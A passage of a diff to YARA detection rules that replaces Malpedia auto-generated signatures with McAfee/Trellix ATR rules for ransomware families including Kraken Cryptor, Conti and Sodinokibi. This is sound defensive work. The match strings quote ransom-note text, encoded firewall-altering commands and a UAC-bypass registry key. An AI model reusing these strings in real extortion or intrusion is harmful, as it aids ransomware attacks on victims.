"C:\\Users\\Krypton\\source\\repos\\UAC\\UAC\\obj\\Release\\UAC.pdb" fullword ascii + $s2 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide + $s3 = "public_key" fullword ascii + $s4 = "KRAKEN DECRYPTOR" ascii + $s5 = "UNIQUE KEY" fullword ascii + + condition: + uint16(0)==0x5a4d and filesize <600KB and $pdb or all of ($s*) +} +rule TRELLIX_ARC_Kraken_Cryptor_Ransomware : RANSOMWARE FILE +{ + meta: + description = "Rule to detect the Kraken Cryptor Ransomware" + author = "Marc Rivero | McAfee ATR Team" + id = "7e1e5fa8-6d87-5e64-a8d4-4dae55ab76ca" + date = "2018-09-30" + modified = "2020-08-14" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Kraken.yar#L32-L64" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd" + logic_hash = "2ad7f0bf6110eab79e0f9541c49ae44089ebca3f91ffa80de874d60d5a7ed266" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Kraken" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $s1 = "Kraken Cryptor" fullword ascii nocase + $s2 = "support_email" fullword ascii + $fw1 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii + $fw2 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii + $fw3 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii + $fw4 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii + $uac = "<!--<requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />--> " fullword ascii + + condition: + uint16(0)==0x5a4d and filesize <600KB and all of ($fw*) or all of ($s*) or $uac +} +rule TRELLIX_ARC_Ransom_Note_Kraken_Cryptor_Ransomware : RANSOMWARE FILE +{ + meta: + description = "Rule to detect the ransom note delivered by Kraken Cryptor Ransomware" + author = "Marc Rivero | McAfee ATR Team" + id = "dec9d364-daf9-5a1d-8e72-ed4dd2aeecdf" + date = "2018-09-30" + modified = "2020-08-14" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Kraken.yar#L66-L108" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "d4acdf0716320b0f757b8dbc97bb9d407460b2d69dc8e12292539e823be0f57d" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Kraken" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $s1 = "No way to recovery your files without \"KRAKEN DECRYPTOR\" software and your computer \"UNIQUE KEY\"!" fullword ascii + $s2 = "Are you want to decrypt all of your encrypted files? If yes! You need to pay for decryption service to us!" fullword ascii + $s3 = "The speed, power and complexity of this encryption have been high and if you are now viewing this guide." fullword ascii + $s4 = "Project \"KRAKEN CRYPTOR\" doesn't damage any of your files, this action is reversible if you follow the instructions above." fullword ascii + $s5 = "https://localBitcoins.com" fullword ascii + $s6 = "For the decryption service, we also need your \"KRAKEN ENCRYPTED UNIQUE KEY\" you can see this in the top!" fullword ascii + $s7 = "-----BEGIN KRAKEN ENCRYPTED UNIQUE KEY----- " fullword ascii + $s8 = "All your files has been encrypted by \"KRAKEN CRYPTOR\"." fullword ascii + $s9 = "It means that \"KRAKEN CRYPTOR\" immediately removed form your system!" fullword ascii + $s10 = "After your payment made, all of your encrypted files has been decrypted." fullword ascii + $s11 = "Don't delete .XKHVE files! there are not virus and are your files, but encrypted!" fullword ascii + $s12 = "You can decrypt one of your encrypted smaller file for free in the first contact with us." fullword ascii + $s13 = "You must register on this site and click \"BUY Bitcoins\" then choose your country to find sellers and their prices." fullword ascii + $s14 = "-----END KRAKEN ENCRYPTED UNIQUE KEY-----" fullword ascii + $s15 = "DON'T MODIFY \"KRAKEN ENCRYPT UNIQUE KEY\"." fullword ascii + $s16 = "# Read the following instructions carefully to decrypt your files." fullword ascii + $s17 = "We use best and easy way to communications. It's email support, you can see our emails below." fullword ascii + $s18 = "DON'T USE THIRD PARTY, PUBLIC TOOLS/SOFTWARE TO DECRYPT YOUR FILES, THIS CAUSE DAMAGE YOUR FILES PERMANENTLY." fullword ascii + $s19 = "https://en.wikipedia.org/wiki/Bitcoin" fullword ascii + $s20 = "Please send your message with same subject to both address." fullword ascii condition: - 7 of them and filesize <597872 + uint16(0)==0x4120 and filesize <9KB and all of them } -rule MALPEDIA_Win_Doubleback_Auto : FILE +rule TRELLIX_ARC_Loocipher_Ransomware : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cd786c05-6d47-522c-af3e-e773839ffcc7" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doubleback_auto.yar#L1-L118" - license_url = "N/A" - logic_hash = "b40ea64a869bfecf3f36d9c35b2ecd274734632c8a0bce79f6229d1b07f00bb7" + description = "Rule to detect Loocipher ransomware" + author = "Marc Rivero | McAfee ATR Team" + id = "d18efe09-4b04-5089-84f8-aead63fc19bb" + date = "2019-12-05" + modified = "2020-08-14" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Loocipher.yar#L1-L46" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "7720aa6eb206e589493e440fec8690ceef9e70b5e6712a9fec9208c03cac7ff0" + logic_hash = "36e452c34fd9bbb521f5422bffdbb71991de66f3faa29292dc3f27c8d7e1f9ba" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Loocipher" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { b9e3050000 eb3b b90b070000 eb34 2d63450000 7428 } - $sequence_1 = { b9ad060000 eb57 b9a7060000 eb50 b947060000 eb49 } - $sequence_2 = { eb3b b90b070000 eb34 2d63450000 } - $sequence_3 = { 3d39380000 741c 3dd73a0000 740e 3dab3f0000 } - $sequence_4 = { b9e7050000 eb42 b9e3050000 eb3b b90b070000 } - $sequence_5 = { b90b070000 eb34 2d63450000 7428 2d57020000 } - $sequence_6 = { 774f 7446 3d00280000 7438 3d5a290000 742a 3d39380000 } - $sequence_7 = { 7438 3d5a290000 742a 3d39380000 } - $sequence_8 = { e8???????? 85c0 7508 c60703 e9???????? } - $sequence_9 = { 7446 3d00280000 7438 3d5a290000 742a 3d39380000 741c } + $x1 = "c:\\users\\usuario\\desktop\\cryptolib\\gfpcrypt.h" fullword ascii + $x2 = "c:\\users\\usuario\\desktop\\cryptolib\\eccrypto.h" fullword ascii + $s3 = "c:\\users\\usuario\\desktop\\cryptolib\\gf2n.h" fullword ascii + $s4 = "c:\\users\\usuario\\desktop\\cryptolib\\queue.h" fullword ascii + $s5 = "ThreadUserTimer: GetThreadTimes failed with error " fullword ascii + $s6 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator *" fullword wide + $s7 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator +=" fullword wide + $s8 = "std::basic_string<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator []" fullword wide + $s9 = "std::vector<struct CryptoPP::ProjectivePoint,class std::allocator<struct CryptoPP::ProjectivePoint> >::operator []" fullword wide + $s10 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator *" fullword wide + $s11 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator +=" fullword wide + $s12 = "std::vector<struct CryptoPP::WindowSlider,class std::allocator<struct CryptoPP::WindowSlider> >::operator []" fullword wide + $s13 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator ++" fullword wide + $s14 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator *" fullword wide + $s15 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::_Compat" fullword wide + $s16 = "std::vector<class CryptoPP::PolynomialMod2,class std::allocator<class CryptoPP::PolynomialMod2> >::operator []" fullword wide + $s17 = "DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery" fullword ascii + $s18 = "std::vector<struct CryptoPP::ECPPoint,class std::allocator<struct CryptoPP::ECPPoint> >::operator []" fullword wide + $s19 = "std::vector<struct CryptoPP::EC2NPoint,class std::allocator<struct CryptoPP::EC2NPoint> >::operator []" fullword wide + $s20 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::_Compat" fullword wide condition: - 7 of them and filesize <106496 + ( uint16(0)==0x5a4d and filesize <17000KB and (1 of ($x*) and 4 of them )) or ( all of them ) } -rule MALPEDIA_Win_Cargobay_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Ransom_Black_Kingdom : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "73c95842-79c7-50a5-be49-1d9ec0676b5e" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cargobay_auto.yar#L1-L134" - license_url = "N/A" - logic_hash = "6881c841016fbba7262559cf71fef612762f65200b77d9ecbf913cbcf1cd6281" - score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + description = "Rule to detect Black Kingdom ransomware that is spread using the latest Exchange vulns" + author = "McAfee ATR" + id = "c38e6dbf-7fb9-52f0-acd0-f824647b6041" + date = "2024-09-01" + modified = "2021-04-06" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/ransom_BlackKingDom.yar#L3-L49" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "334e84a9469367ed64509203feb61b5f64d5a7e38d29ff5c5089631246b06588" + score = 50 + quality = 68 + tags = "RANSOMWARE, FILE" + malware_type = "ransomware" + malware_family = "Ransomware:W32/BlackKingdom_March2021" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { e9???????? 4c8b4910 31c0 4c01ca 7216 48395108 7210 } - $sequence_1 = { 80bc24b100000000 0f84e2020000 8a8c24b2000000 0fb6d1 83fa2c 743e b800000000 } - $sequence_2 = { e8???????? eb56 488db42498010000 41b8b8000000 4889f1 4c89fa e8???????? } - $sequence_3 = { c6040800 48ffc1 ebf2 488b4748 41b801000000 4889f9 4c89e2 } - $sequence_4 = { eb04 48832300 4889f1 4c89f2 4883c448 5b 5d } - $sequence_5 = { e8???????? 0f0b 56 57 4881ec18040000 4889ce 488d7c2428 } - $sequence_6 = { ba05000000 e8???????? e9???????? 488d0dddfe0d00 ba09000000 e8???????? 4889c3 } - $sequence_7 = { c5fa6f8729020000 c4e27d470d???????? c4e27d4505???????? c5fd6f15???????? c4e26d36c0 c5fdebc1 c5fddb05???????? } - $sequence_8 = { 4d896608 488d8c2488000000 488919 48897108 48898424b0000000 4889bc24b8000000 4d8937 } - $sequence_9 = { ba08000000 41b908000000 e8???????? 4881c600020000 4889f1 4c89f2 e8???????? } + $0 = {7D3F634F627C5EC4D893189F1731F624A6AD458C3D89E9CB22C69EC4B4B588B1A7307D8963EC294C5B718C3D85692B8EB1A730732F8EB16F65EA5CEC17834A665E} + $1 = {3E774F2038FDE77377253CD11BFEB6FB82CF6A03E1B34E134C78A2CFDC1B7CD63AD167EE4E78A227FEF694EE3369143D1B0E84CF7CDAE7C3037C263DD15B979F} + $2 = {0C674D0A2427CDDD9B68213EC0B4A5DF94B19D39BEC0C562346FC7A1D32C0FA5BC9D963440910709A2365360650F5A909685912220EEC0F8157B3E2B95EA2CE9} + $3 = {7B7251266178C52BA731333F9E8A1C327A239FB81B901BAB2755FCAFD8A753F47991516A5C98A6CAAC9A1D5065DE565D87F120B3519DD91E09D353B7120EF9F2} + $4 = {2E233E25767037CA68F9C0F026A5CDDCC08FC0DCE21F61C612F1983A29BD3D986F8239A7692B0EBD478B6C8115564D5B0671346CF7CDDB612247EA7A4FAA7C71} + $5 = {2B2C3249094C8A1A9734E7515D10F78FD1B9339DF1902AC1D4ADE70C27C8A2CA7F3416B7B9F0D10E67519D589B8AD64D6435CC2DF4C2092A4BCEF7053B194AE5} + $6 = {0B297C7D79ECD339B30E87775B6769909CD886D1FBBAF2041DCC4FB11B5BA777AA626A9E8CAC14F64BEA5299A8E304A22BA25FA4F7AC4B95E8ACC42EC33A3DE4} + $7 = {0D46503D4DFD825DED41C94C055E1FCE1134C6F63AD80DCD7427F4BD502FA186077BD22653AB098C96ECDDA26557FB82BBA053CB2067C9DEA7EE0AF6A44C468A} + $8 = {2E774F2038FDE77277253CD11BFEB6FB82CB6A03E1B34E134C78A2CFDC1B5CD63AD167EE4E78A227FEF694EE3269143D1B0E84CF7CDAE5C3035C263DD15B979B} + $9 = {5C4250510A8DEF3463BF7410DEE0E72759B8A94A4D0544BD9B4FC0846E61844F4E06B779ABF906A450F5A2AC4C57CF761798C539175F092FD2429DC27909E382} + $10 = {7C787B386177B4D7F1F6B9E6FE17154FF15BD9E3F1DA94A1E1064654E7500A0B86A20A4AA16BD4E16F19A8733960DE868F10F382CDEEC1F15CE718839241DA10} + $11 = {2C3C6F6B2E597AC746FF7664087C7E899ABCC27AC60FA545D9CF4323063896D299F57132FE3E63E567EBFADF296365A1B2C0163DD8A4F3DABA04C77FA39A99CB} + $12 = {7B3C5D7C73D34D1A6C66B91990D162CACD89ECEAF591AC56C95AB3151EBAC1687FB749924B7BC27917FE50CA6C1417FEDBCC5BA2B7C03B1AEE4F5732E69DAC14} + $13 = {406357775C42584F11A1610D3A8A31F094FA252BC3E10738BD310D536D3A2F9EC5C21996AC4DCF5237AE3A4467D5678EE2983E4282ADFB1FDEA16352109BA7A7} + $14 = {2F265663680CACC66731B11AA78D588D7B54AC06C6348905D6B8F52C608D8208B0C6C5F1C11A2F69608D363DFA2A365AA387DAFCC906B486548F3DA8FE36312E} + $15 = {2B37480D634C799C468B775404368C7B891ADE3A556DF888566EB8CB3ED6F0171B59C35BB57F3B75D9017B7C9D52D1E87F48795AA58A16695B98BAFEAF66A769} + $16 = {0A76372D4F488ED5649A19B42E9E42B1DCC2E62655E7041711A6235B825D791CD6519492309D46964594F78B1DCAD17A5BEA574166B8A8EB76A52CA1052D724A} + $17 = {3D0B635F789C6CA6ADAC549548AA509C99D0C8DD823C99704423B90175B062E70EBBA67F937D622FF41B59D21E763A26D36759F3297D12B7454D82676C5B7B4A} + $18 = {225B642B7A09E7B06A4D3B95D97927AC46DABAE3ECE93AA4B307259DB9C01361C905B240678DB830EB7E172EB939ECB188ED3504B3709A746772B7BC94C83FB6} + $19 = {27465E49761EECAF449A3AB147907CF1C3D5F161D353E236BF9940AEC099EA4AC0352576803626029A15B3E978AB84D0024A1E345FFE58A81CDA2FBD61408971} + $20 = {3B7431210BEE4762B447DF044B5D6F41D53824C3E2CD17A35D71029352B47DA3811C60458EAADEBA532F75C54A3DDFC74AB3BEA7A51AF81A4A688F5D7A10378C} + $21 = {276C41453F8F2D8279980EAD3328E2478A3D84C55EB668231A12EED150E496622FCB2C04D9CBCE257BD97B9ECE404037589A185573F936A78DA88AD43EFC3948} + $22 = {2727495F5B1B4D920E35A52B6A5DB6A7F8B31A26873E20C53388696567D692B4B1F4A0B9267E4BBDA1728A5E883FD69029A07669AC1D0DC22E3157C028705C19} + $23 = {3E5552672C26C4F22824AF196F222D370F9EEDBEF119B8C3DD96414CF3529912234CB08AA7B2A034A51635319EAC44D47FA68747BA4B2FD2A884373ADEFB5C84} + $24 = {20735E632C6C70375BCA935EE39B7FA508205E9CC034CBD193A0D1C1E3A9A13818B9EB7FEFB11891E71221DB7143286C7D36A91C1FF7615E38F02E5C1BA24AFF} + $25 = {0A3D69344860D944AA8A46908019AB085E025AA693D381A34D8DCF116B25B0C62355D93893D1F64B983986C7E956C22303A9AB109680BF4B74460C5B087412AF} + $26 = {7C5B79652BC66C9BC36B11730D556FFA1CA1616CA59C0C344FD1F6B50C9C259329D699CDF0B894F1540AFDC4F431957206B0748AB6AE3B9069CD91147E09709B} + $27 = {2257442B42DB79A5E6CAD745E9A8D9775E4216C95F6094A05F05D7DAADBB03EC4B3444983DD291C2E32FC39299BCB4D22219386E75DAABB8D2EA93DFC52A248B} + $28 = {3C0D4A68792594D2F23F10A465B38B75D272318CA0E532A8A183F8CE5DEE6B45ECFDC96E4FF9158832472ED8CDFA69F92868A503F821D848CBB97B58332D8F84} condition: - 7 of them and filesize <3432448 + uint16(0)==0x5a4d and all of them } -rule MALPEDIA_Win_Mqsttang_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Ransom_Conti : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "37b83f83-ada9-5cb9-9846-c597be16b8c2" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mqsttang_auto.yar#L1-L134" - license_url = "N/A" - logic_hash = "816bebdcfc28d4925b60f084aa814ab97a3079e189efd77c5fe0d0005fa07653" + description = "Conti ransomware is havnig capability too scan and encrypt oover the network" + author = "McAfee ATR team" + id = "8fc6943d-fb99-5957-929b-4c264d9fba2d" + date = "2020-07-09" + modified = "2020-10-12" + reference = "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Conti.yar#L3-L37" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe" + logic_hash = "953471c130309bbc712197d49d2072bd45838f49d2b25f86273a15c6baa87354" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Conti" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { f20f2ac0 f20f5905???????? 660f28c8 660f54ca 660f2ed9 7629 f20f58cb } - $sequence_1 = { f0832801 8b85c0fdffff 0f845a010000 8b85b4fdffff 89780c 8b400c 85c0 } - $sequence_2 = { e9???????? 89c7 89d9 89fb e8???????? 89f1 e8???????? } - $sequence_3 = { ff5074 8b03 83ec04 89d9 8b707c ff5078 890424 } - $sequence_4 = { e9???????? c74424240a030000 c744242001000000 e9???????? c74424240b030000 c744242000000000 e9???????? } - $sequence_5 = { e8???????? e9???????? c744240405000000 c70424???????? e8???????? 8d5de4 8b4dd4 } - $sequence_6 = { e8???????? 8d4c247c e8???????? 8d8c2480000000 e8???????? 8d8c2484000000 e8???????? } - $sequence_7 = { f6040e10 7441 83c002 47 894338 39bdd8aeffff 77c7 } - $sequence_8 = { f30f11442430 f20f115c2428 f30f11542420 f30f114c2418 e8???????? f20f106c2438 f20f105c2428 } - $sequence_9 = { e9???????? c744240cffffffff c7442408???????? 89542404 03400c 890424 e8???????? } + $string1 = "HOW_TO_DECRYPTP" fullword ascii + $string2 = "The system is LOCKED." fullword ascii + $string3 = "The network is LOCKED." fullword ascii + $code1 = { ff b4 b5 48 ff ff ff 53 ff 15 bc b0 41 00 85 c0 } + $code2 = { 6a 02 6a 00 6a ff 68 ec fd ff ff ff 76 0c ff 15 } + $code3 = { 56 8d 85 38 ff ff ff 50 ff d7 85 c0 0f 84 f2 01 } condition: - 7 of them and filesize <12651520 + uint16(0)==0x5a4d and filesize <300KB and pe.number_of_sections==5 and (pe.imphash()=="30fe3f044289487cddc09bfb16ee1fde" or ( all of them and all of ($code*))) } -rule MALPEDIA_Win_Powerpool_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Sodinokobi : RANSOMWARE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0805ab0c-2483-51ef-91bd-613062750253" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powerpool_auto.yar#L1-L157" - license_url = "N/A" - logic_hash = "c10aba7ea9fc986a00a689a799239b370f623f0a4bcaeb12871b3235333f8df6" + description = "This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future." + author = "McAfee ATR team" + id = "dd05ce31-9699-50a9-944c-5883340791af" + date = "2024-09-01" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Sodinokibi.yar#L33-L54" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "f25039ac743223756461bbeeb349c674473608f9959bf3c79ce4a7587fde3ab2" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE" + malware_type = "ransomware" + malware_family = "Ransom:W32/Sodinokibi" + actor_type = "Cybercrime" + actor_group = "Unknown" + version = "1.0" strings: - $sequence_0 = { 741f 90 8b4e54 8a01 } - $sequence_1 = { 7420 8b4514 8b4dfc 81c12c020000 } - $sequence_2 = { 895de8 8b5dcc 2bd8 895940 8b5dd0 } - $sequence_3 = { 005311 40 005d11 40 006711 } - $sequence_4 = { 7420 83e91d 7412 83e903 0f8515010000 c745dcfcae4400 } - $sequence_5 = { 7420 3c0a 740c 6a0a 6a01 8d4b14 } - $sequence_6 = { 741f d945b8 03c0 03c0 } - $sequence_7 = { 8b5c2410 23da c1ce0a 03f2 23ee 0bdd 035c2418 } - $sequence_8 = { 895dd0 8b7940 897dcc 3bc7 7613 } - $sequence_9 = { 7420 807de000 741a 8b4ddc } - $sequence_10 = { 006711 40 0000 0303 } - $sequence_11 = { 7420 8b4508 8b4d0c 3bc1 } - $sequence_12 = { 895ddc 895dfc 8d45e0 50 } - $sequence_13 = { 895de0 895de4 33c9 66898dd0fdffff } - $sequence_14 = { 895ddc 8b45e4 50 e8???????? } - $sequence_15 = { 744f 53 57 8bff 8bc8 } + $a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF } + $b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA } condition: - 7 of them and filesize <819200 + all of them } -rule MALPEDIA_Win_Laturo_Auto : FILE +rule TRELLIX_ARC_Jeff_Dev_Ransomware : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a099051d-06cc-5747-80aa-ce74001854da" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.laturo_auto.yar#L1-L179" - license_url = "N/A" - logic_hash = "5c5686ac498628ddacc2bb584f3ee57bf281fd85acd0c0e6dfbd3f9934f8bef4" + description = "Rule to detect Jeff Dev Ransomware" + author = "Marc Rivero | McAfee ATR Team" + id = "dd5e24f4-a2d8-5db5-9e7e-7f8bded5d401" + date = "2018-08-26" + modified = "2020-08-14" + reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_jeff_dev.yar#L1-L28" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "386d4617046790f7f1fcf37505be4ffe51d165ba7cbd42324aed723288ca7e0a" + logic_hash = "58a408f4e1781540e4abdb87b85b94c1f0ea49b40bf241d6d074bc2162ac2032" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 45 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Jeff" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { 486bc038 488b0d???????? 8b440120 c1e01e c1f81f 3b442450 741a } - $sequence_1 = { e8???????? 33db 8bf8 85c0 0f8453020000 4c8d2dea040100 } - $sequence_2 = { 884814 0fb644243c 83f805 7511 0fb6442405 83e001 85c0 } - $sequence_3 = { 48837c242000 7432 488b442430 4839442420 720c } - $sequence_4 = { 488d0d13800100 33c0 8b542420 f00fb111 85c0 742c 48837c242820 } - $sequence_5 = { 4c8d34c0 49c1fc06 4a8b84e1f0a50100 4a8b44f028 488945bf } - $sequence_6 = { 488b09 448b0481 33d2 b95a000000 ff15???????? } - $sequence_7 = { 4883f9fd 7706 ff15???????? 488364243000 488d0dfc7b0000 8364242800 41b803000000 } - $sequence_8 = { 8bc2 8955e4 c1e802 8bf2 8b55f0 83e603 } - $sequence_9 = { b803000000 50 68???????? ff763c e8???????? 83c40c 85c0 } - $sequence_10 = { 7510 46 83c028 3bf2 } - $sequence_11 = { 8a4dfe 84c0 8a45ff 7909 } - $sequence_12 = { 53 ff15???????? 50 ff15???????? 834f1406 8b15???????? 8b4df4 } - $sequence_13 = { 6bd730 8b0c8d30430110 